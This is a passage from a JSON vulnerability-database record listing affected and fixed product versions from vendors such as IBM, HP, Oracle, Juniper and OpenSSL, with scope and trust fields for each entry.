        "model": "db2\u00ae connect? application server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "project openssl i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.16"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.4.0.4.0"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.10"
      },
      {
        "model": "cloud orchestrator enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.0.1"
      },
      {
        "model": "junos 13.2x51-d26",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.13"
      },
      {
        "model": "secure backup",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.0.3"
      },
      {
        "model": "linux x86 64 -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.4.0.6"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.18"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "junos 14.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.3"
      },
      {
        "model": "rational developer for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.1"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.3"
      },
      {
        "model": "tivoli netcool system service monitor fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.0.0"
      },
      {
        "model": "i v5r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "fortivoice enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.0.6"
      },
      {
        "model": "junos d10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x44"
      },
      {
        "model": "hp-ux b.11.23",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "junos 12.1x46-d35",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "flashsystem 9846-ac0",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.7"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1"
      },
      {
        "model": "i v5r4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "db2 enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "db2 connect application server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.15"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.28"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.4.19"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.2.0.5"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.13"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.1"
      },
      {
        "model": "hp-ux b.11.11.02.008",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "junos 12.1x44-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.11"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.16"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.21"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.4"
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.0"
      },
      {
        "model": "system networking rackswitch g8264",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.15.0"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "i v5r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "junos 12.1x46-d55",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "db2 connect unlimited advanced edition for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.6"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "netinsight",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6.0.14"
      },
      {
        "model": "junos 12.1x47-d11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "tivoli directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.3.0.5"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.35"
      },
      {
        "model": "virtual connect enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "system networking rackswitch g8332",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.21.0"
      },
      {
        "model": "websphere mq",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.010"
      },
      {
        "model": "system networking rackswitch g8124",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.11.5.0"
      },
      {
        "model": "gpfs storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.1"
      },
      {
        "model": "project openssl c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "junos d25",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x46"
      },
      {
        "model": "junos 12.3r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.3r7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.15"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "rational developer for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.12"
      },
      {
        "model": "db2 express edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.9"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.4.19"
      },
      {
        "model": "abyp-10g-4sr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "fortisandbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "2.0"
      },
      {
        "model": "http server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.5.10.2"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.1"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "db2\u00ae advanced workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "project openssl 0.9.8zg",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "junos 14.2r4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.13"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.4"
      },
      {
        "model": "mobile connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.5"
      },
      {
        "model": "san volume controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4.0.6"
      },
      {
        "model": "junos 13.2x51-d40",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "powerkvm build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.157"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "junos 13.2x51-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.9"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.26"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2"
      },
      {
        "model": "gpfs storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1.1"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "virtual connect enterprise manager sdk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.3"
      },
      {
        "model": "abyp-0t-4s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.0.17"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "junos d25",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x44"
      },
      {
        "model": "junos 12.1x47-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.6"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.71"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.8"
      },
      {
        "model": "insight orchestration",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "db2\u00ae express edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.3"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.1"
      },
      {
        "model": "project openssl 1.0.0c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.8"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.7"
      },
      {
        "model": "security appscan enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1.3"
      },
      {
        "model": "cloud orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.0.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.17"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.3.0.12"
      },
      {
        "model": "project openssl 1.0.0s",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.5"
      },
      {
        "model": "db2 connect enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "insight orchestration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.4"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "junos d35",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x44"
      },
      {
        "model": "vcx products",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.3"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.210"
      },
      {
        "model": "db2 connect unlimited edition for system i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "junos 12.1x47-d45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "spectrum scale",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.1.2"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.10"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.2"
      },
      {
        "model": "db2 connect unlimited edition for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.4"
      },
      {
        "model": "security network controller 1.0.3381m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.4"
      },
      {
        "model": "db2 purescale feature",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "elastic storage server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.4"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.37"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "spectrum scale",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.1.0"
      },
      {
        "model": "elastic storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.2"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "tivoli netcool system service monitor fp14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "project openssl d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "transportation management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "flashsystem 9843-ae2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.9"
      },
      {
        "model": "db2\u00ae connect? unlimited edition for system i\u00ae",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "system networking rackswitch g8264cs",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.8.12.0"
      },
      {
        "model": "junos 12.1x44-d40",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1x44-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.13"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.2.0.5"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.6"
      },
      {
        "model": "gpfs storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.3"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.2"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.211"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "project openssl 1.0.0b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.1m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.4"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "junos 12.1x46-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.1.0.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.5"
      },
      {
        "model": "elastic storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.5"
      },
      {
        "model": "hp-ux b.11.11.17.02",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "fortimanager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.9"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.3.0.5"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.16"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.11"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.9"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "general parallel file system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.1.2"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.3"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "infosphere information server",
